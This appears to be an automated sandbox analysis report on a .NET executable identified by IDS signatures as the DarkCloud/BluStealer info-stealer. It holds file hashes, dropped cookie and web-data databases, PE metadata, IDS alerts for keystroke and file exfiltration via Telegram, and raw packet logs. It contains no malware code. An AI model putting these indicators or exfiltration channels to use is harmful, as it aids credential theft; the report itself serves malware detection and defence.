C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db-shm

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.8390222794545545
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	yMvZXcwN2OdoP6x.exe
File size:	997'888 bytes
MD5:	936823354ce6b1d705e73fea6784b33e
SHA1:	6116d95d45565cc8a82b5cd49f505c8717d37852
SHA256:	71a2d3cf903f921cc65fbcdde44707d22939e8c1d520a3a4d80e06985bcdf7a5
SHA512:	e541747d054b47447a320fd7decf467c5f37f23f2311cfe45e9c36b978f518554a03573d650b87d9495f7a316e405b875adc8b6bcc572d211cc75564115db6b7
SSDEEP:	24576:KtIIee8ckEH0Rdzw0PkzwS47CyxS9ptHzhgQnCBI:xBe8ckEHWG4oHzhgQnM
TLSH:	3A25019C3510B04FC517C5314E70FDB5BA986EAE960782139AD72EEFF92D866CE041E2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng..............0......P........... ... ....@.. ....................................@................................

File Icon


Icon Hash:	033424c4c199d839

Static PE Info

General

Entrypoint:	0x4f072e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x674E9EB5 [Tue Dec 3 06:01:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf06e0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf2000	0x4ca8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xee734	0xee800	1ed431db1053463d13eb705dc06961e3	False	0.9258928278957023	data	7.841450214817603	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf2000	0x4ca8	0x4e00	2b70663d05c2189083910c50a243b12f	False	0.9410556891025641	data	7.769062163029596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf8000	0xc	0x200	dc35836e4ce42eeed75355bd83ea4dad	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xf2130	0x46f9	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9932852661126094
RT_GROUP_ICON	0xf682c	0x14	data	1.05
RT_VERSION	0xf6840	0x278	data	0.47151898734177217
RT_MANIFEST	0xf6ab8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-03T14:27:31.708316+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49709	162.55.60.2	80	TCP
2024-12-03T14:27:31.803245+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49711	162.55.60.2	80	TCP
2024-12-03T14:27:39.818526+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49732	149.154.167.220	443	TCP
2024-12-03T14:27:40.498169+0100	2044741	ET MALWARE DarkCloud Stealer File Grabber Function Exfiltrating Data via Telegram	1	192.168.2.5	49732	149.154.167.220	443	TCP
2024-12-03T14:27:40.584073+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49733	149.154.167.220	443	TCP
2024-12-03T14:27:41.199005+0100	2044741	ET MALWARE DarkCloud Stealer File Grabber Function Exfiltrating Data via Telegram	1	192.168.2.5	49733	149.154.167.220	443	TCP
2024-12-03T14:27:53.085683+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49758	149.154.167.220	443	TCP
2024-12-03T14:27:54.282756+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49761	149.154.167.220	443	TCP
2024-12-03T14:27:59.119827+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49773	149.154.167.220	443	TCP
2024-12-03T14:27:59.720164+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49774	149.154.167.220	443	TCP
2024-12-03T14:27:59.754705+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49773	149.154.167.220	443	TCP
2024-12-03T14:28:00.317889+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49774	149.154.167.220	443	TCP
2024-12-03T14:28:11.369694+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49802	149.154.167.220	443	TCP
2024-12-03T14:28:11.818559+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49804	149.154.167.220	443	TCP
2024-12-03T14:28:17.078156+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49816	149.154.167.220	443	TCP
2024-12-03T14:28:17.321368+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49817	149.154.167.220	443	TCP
2024-12-03T14:28:17.736760+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49816	149.154.167.220	443	TCP
2024-12-03T14:28:17.902969+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49817	149.154.167.220	443	TCP
2024-12-03T14:28:24.787500+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49834	149.154.167.220	443	TCP
2024-12-03T14:28:25.216955+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49836	149.154.167.220	443	TCP
2024-12-03T14:28:30.261640+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49848	149.154.167.220	443	TCP
2024-12-03T14:28:30.937992+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49848	149.154.167.220	443	TCP
2024-12-03T14:28:31.006816+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49850	149.154.167.220	443	TCP
2024-12-03T14:28:31.718871+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49850	149.154.167.220	443	TCP
2024-12-03T14:28:35.608050+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49861	149.154.167.220	443	TCP
2024-12-03T14:28:36.499499+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49864	149.154.167.220	443	TCP
2024-12-03T14:28:41.171008+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49875	149.154.167.220	443	TCP
2024-12-03T14:28:41.800630+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49879	149.154.167.220	443	TCP
2024-12-03T14:28:41.936651+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49875	149.154.167.220	443	TCP
2024-12-03T14:28:42.433585+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49879	149.154.167.220	443	TCP
2024-12-03T14:28:45.191433+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49884	149.154.167.220	443	TCP
2024-12-03T14:28:46.143363+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49889	149.154.167.220	443	TCP
2024-12-03T14:28:50.943844+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49900	149.154.167.220	443	TCP
2024-12-03T14:28:51.764275+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49900	149.154.167.220	443	TCP
2024-12-03T14:28:51.837263+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49903	149.154.167.220	443	TCP
2024-12-03T14:28:52.534495+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49903	149.154.167.220	443	TCP
2024-12-03T14:28:54.820932+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49909	149.154.167.220	443	TCP
2024-12-03T14:28:55.582141+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49913	149.154.167.220	443	TCP
2024-12-03T14:29:00.386632+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49925	149.154.167.220	443	TCP
2024-12-03T14:29:01.045678+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49925	149.154.167.220	443	TCP
2024-12-03T14:29:01.178006+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49927	149.154.167.220	443	TCP
2024-12-03T14:29:01.832425+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49927	149.154.167.220	443	TCP
2024-12-03T14:29:04.119907+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49935	149.154.167.220	443	TCP
2024-12-03T14:29:05.492173+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49938	149.154.167.220	443	TCP
2024-12-03T14:29:09.732230+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49949	149.154.167.220	443	TCP
2024-12-03T14:29:10.390995+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49949	149.154.167.220	443	TCP
2024-12-03T14:29:11.136081+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49953	149.154.167.220	443	TCP
2024-12-03T14:29:11.999491+0100	2045300	ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram	1	192.168.2.5	49953	149.154.167.220	443	TCP
2024-12-03T14:29:15.026286+0100	2852388	ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4	1	192.168.2.5	49962	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 14:27:30.304465055 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:30.353142977 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:30.424518108 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:30.427505016 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:30.431108952 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:30.473532915 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:30.473634958 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:30.473855019 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:30.551460028 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:30.594038010 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708247900 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708287001 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708306074 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708316088 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.708359957 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.708359957 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.708432913 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708446980 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708475113 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708489895 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708499908 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.708561897 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.708631039 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708645105 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708667994 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.708673000 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.708693981 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.708707094 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.803172112 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803205013 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803217888 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803245068 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.803283930 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.803339005 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803416014 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.803498983 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803513050 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803525925 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803539038 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803546906 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.803560972 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.803589106 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.803718090 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803735018 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.803760052 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.804054022 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.828497887 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.828608990 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.828639984 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.828881025 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.832701921 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.832823038 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.900154114 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.900249004 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.900260925 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.900306940 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.904330969 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.904409885 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.904503107 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.904561996 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.912853003 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.912946939 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.915817022 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.915859938 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.915874004 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.915913105 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.923413038 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.923434973 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.923506021 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.924186945 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.924247980 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.924292088 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.924335003 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:31.932816982 CET	80	49709	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:31.933016062 CET	49709	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:32.004875898 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.005036116 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.005119085 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:32.008606911 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.010292053 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.010305882 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.010371923 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:32.010371923 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:32.018626928 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.018692017 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:32.018764019 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.018804073 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:32.027069092 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.027127028 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:32.027132988 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.027182102 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:32.035455942 CET	80	49711	162.55.60.2	192.168.2.5
Dec 3, 2024 14:27:32.039453030 CET	49711	80	192.168.2.5	162.55.60.2
Dec 3, 2024 14:27:38.348649979 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:38.348694086 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:38.348757029 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:38.351516008 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:38.351528883 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:39.135014057 CET	49733	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:39.135059118 CET	443	49733	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:39.135168076 CET	49733	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:39.148108959 CET	49733	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:39.148121119 CET	443	49733	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:39.766715050 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:39.766810894 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:39.815294981 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:39.815320969 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:39.815660954 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:39.815743923 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:39.818209887 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:39.818440914 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:39.818478107 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:40.498229980 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:40.498292923 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:40.498344898 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:40.498344898 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:40.498759985 CET	49732	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:40.498778105 CET	443	49732	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:40.530625105 CET	443	49733	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:40.530734062 CET	49733	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:40.581685066 CET	49733	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:27:40.581712961 CET	443	49733	149.154.167.220	192.168.2.5
Dec 3, 2024 14:27:40.582055092 CET	443	49733	149.154.167.220	192.168.2.5
